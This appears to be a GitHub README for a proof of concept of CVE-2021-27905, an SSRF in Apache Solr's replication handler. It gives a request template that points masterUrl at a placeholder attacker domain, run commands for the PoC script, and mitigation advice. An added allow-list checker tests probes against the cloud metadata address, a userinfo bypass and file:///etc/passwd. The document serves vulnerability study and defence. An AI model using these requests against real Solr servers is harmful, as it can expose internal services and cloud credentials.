
RIZZZIOM/CVE-2021-27905


CVE-2021-27905

| Sr No | Title |
| --- | --- |
| 1 | Overview |
| 2 | Root Cause |
| 3 | Proof Of Concept |
| 4 | Mitigation (8.8.2+) |
| 5 | Reference |

For educational and research purposes only. Do not use this code on systems you do not own or have explicit permission to test. I am not responsible for any misuse.

Overview

CVE-2021-27905 is a Server Side Request Forgery (SSRF) vulnerability in Apache Solr versions before 8.8.2. An attacker who can reach a core's /replication endpoint can make the Solr server issue HTTP requests to hosts of their choosing, internal or external, through the replication handler's masterUrl parameter (alias leaderUrl). This can expose internal services that are not otherwise reachable, including cloud instance-metadata endpoints.

Affected Versions: all versions prior to 8.8.2 (7.0.0 - 7.7.3, 8.0.0 - 8.8.1)

Root Cause

Solr's replication mechanism lets a replica core fetch index files from a master/leader core whose address is supplied in the masterUrl (newer releases: leaderUrl) request parameter. In the affected versions the handler does not validate this URL against any list of approved hosts, so anyone who can send a request to the /replication endpoint can make the Solr server connect to a remote resource of their choosing.

Vulnerable Flow

  • An attacker sends a request to an endpoint such as:
```
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>
```

Solr's ReplicationHandler then:

  1. Accepts the request.
  2. Uses the provided masterUrl as the address of the leader to download index data from.
  3. Internally makes an HTTP call to that address.

The handler answers the fetchindex command right away (normally with status OK) and performs the fetch in a background thread, so a successful reply by itself proves nothing. The SSRF is confirmed out-of-band: the listener at <ATTACKER_DOMAIN> sees the inbound connection from the Solr host.

Proof Of Concept

LAB SETUP

  • A lab can be set up locally with docker:
```bash
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
```
  • Cleanup:
```bash
$ docker compose down
```

EXPLOITATION

  • Set up a virtual environment:
```bash
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/bin/activate
```
  • Install requirements:
```bash
$ pip install -r requirements.txt
```
  • Run cve-2021-27905.py, where <TARGET> is the lab Solr instance and <SSRF_PAYLOAD> is the URL Solr should be made to request. Point the payload at a listener you control: the inbound connection from the Solr host is what confirms the SSRF, not the handler's reply.
```bash
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>
```

(Screenshot: SSRF PoC)

Mitigation (8.8.2+)

Solr's ReplicationHandler was patched in 8.8.2 to:

  • Validate that masterUrl/leaderUrl points only to approved hosts. The allow-list is configured as allowUrls in solr.xml (or with the solr.allowUrls system property); a URL whose host is not on it is rejected instead of being fetched.
  • Restrict acceptable URL schemes (http and https only).
  • Harden remote streaming features.

Administrators should upgrade to 8.8.2 or later and, in addition, restrict /replication with authentication and authorization, or remove the handler entirely where replication is not used.
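To make the allow-list fix concrete, here is an added Python illustration of the check the patched handler performs before a fetch. It is not Solr's own Java implementation and not code from this repository; the ALLOW_URLS entries and the probe set (a legitimate leader, the cloud metadata address, a userinfo bypass attempt, a wrong port and a non-http scheme) are constructed for the example.

```python
"""Added example (not Solr's code, not from this repository): the allow-list
check that separates the vulnerable handler from the patched one.
ALLOW_URLS and the handler model are constructed for the illustration."""
from urllib.parse import urlsplit

# Constructed stand-in for the configured allow-list: the only leaders this
# replica may pull an index from, as host:port.
ALLOW_URLS = frozenset({"solr-leader-1:8983", "solr-leader-2:8983"})


def leader_url_is_allowed(url: str, allow_list=ALLOW_URLS) -> bool:
    """True only for an http(s) URL whose host:port is on the allow-list.

    The URL is parsed rather than substring-matched, so a userinfo trick such
    as http://solr-leader-1:8983@169.254.169.254/ resolves to the real host,
    and a missing port is filled in with the scheme default before comparison.
    """
    try:
        parts = urlsplit(url.strip())
        host, port = parts.hostname, parts.port  # .port raises ValueError on junk
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not host:
        return False
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    allowed = {entry.lower() for entry in allow_list}
    return f"{host}:{port}" in allowed  # .hostname is already lower-cased


def fetchindex_decision(master_url: str, patched: bool) -> str:
    """Model of what the handler does with masterUrl before and after the fix.

    Unpatched (< 8.8.2): the URL is handed straight to the index fetcher.
    Patched  (>= 8.8.2): the fetch only starts when the URL passes the check.
    """
    if patched and not leader_url_is_allowed(master_url):
        return "rejected"
    return "fetch from " + master_url


# Constructed probe set: one legitimate leader plus typical SSRF targets and bypasses.
PROBES = [
    "http://solr-leader-1:8983/solr/core1",
    "http://169.254.169.254/latest/meta-data/",
    "http://solr-leader-1:8983@169.254.169.254/",
    "http://SOLR-LEADER-2:8983/",
    "http://solr-leader-1/",
    "file:///etc/passwd",
]


def compare(probes=PROBES) -> dict:
    """Map each probe URL to (unpatched outcome, patched outcome)."""
    return {p: (fetchindex_decision(p, False), fetchindex_decision(p, True)) for p in probes}


if __name__ == "__main__":
    for url, (before, after) in compare().items():
        print(f"{url:48} unpatched: {before:55} patched: {after}")
```

The comparison is exact (host and port), which is why http://solr-leader-1/ is refused even though the host name matches: an entry on the list names one Solr endpoint, not a machine.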

Reference

